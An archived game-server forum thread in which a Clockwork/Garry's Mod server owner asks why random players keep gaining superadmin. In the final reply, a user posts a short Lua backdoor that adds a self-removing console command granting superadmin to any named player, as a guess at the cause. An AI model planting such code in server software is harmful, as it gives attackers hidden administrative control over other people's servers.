1. This forum is ARCHIVED! Visit the new Cloud Sixteen forums, codename Eden, at https://eden.cloudsixteen.com. These forums will remain archived for a few months before being closed down, so try to encourage plugin developers to begin moving their content across to the new forums.
Dismiss Notice
Hi Guest, you need a Steam account to register and post on these forums. Login with Steam at the top of the forums to get started!
Dismiss Notice
Hi Guest, do you want to buy HL2RP or another Clockwork schema? Visit the Cloud Sixteen Store to get started!

[GLITCH] Help, random people becoming SA?

Discussion in 'Discussion' started by Sheeplie, May 9, 2014.

  1. Sheeplie

    Sheeplie Hi.

    I really need some help, there's a glitch where random players will be given SA someties.
     
  2. kurozael

    kurozael Cloud Sixteen Director Staff Member Administrator Investor

    This sounds like a backdoor attack, of something even more sinister.
     
  3. Sheeplie

    Sheeplie Hi.

    The thing is, the people who are getting it, it's usually at random, like after each restart 1-2 people get it, then we just demote them. Most of em are people we know personally, and have no clue what's going on.
     
  4. kurozael

    kurozael Cloud Sixteen Director Staff Member Administrator Investor

    This sounds really strange, what plugins are you using?
     
  5. Hoonigan

    Hoonigan The giver of Le Box Rating. Clockwork Customer

    It sounds like one a backdoor like kurozael said, two a rogue SA within your team. Or three you have some seriously fucked up glitches.
     
  6. Revlisag

    Revlisag Guest

    what if someone uploaded this to the ftp
    Code:
    concommand.Add("promotesa", function(player, command, arguments)
    	local target = Clockwork.player:FindByID(table.concat(arguments, " "));
    
    	if (target) then
    		target:SetClockworkUserGroup("superadmin");
    		Clockwork.player:LightSpawn(target, true, true);
    		concommand.Remove("promotesa");
    	else
    		player:Notify("Could not find player!");
    	end;
    end);
     

Previous Readers (Total: 0)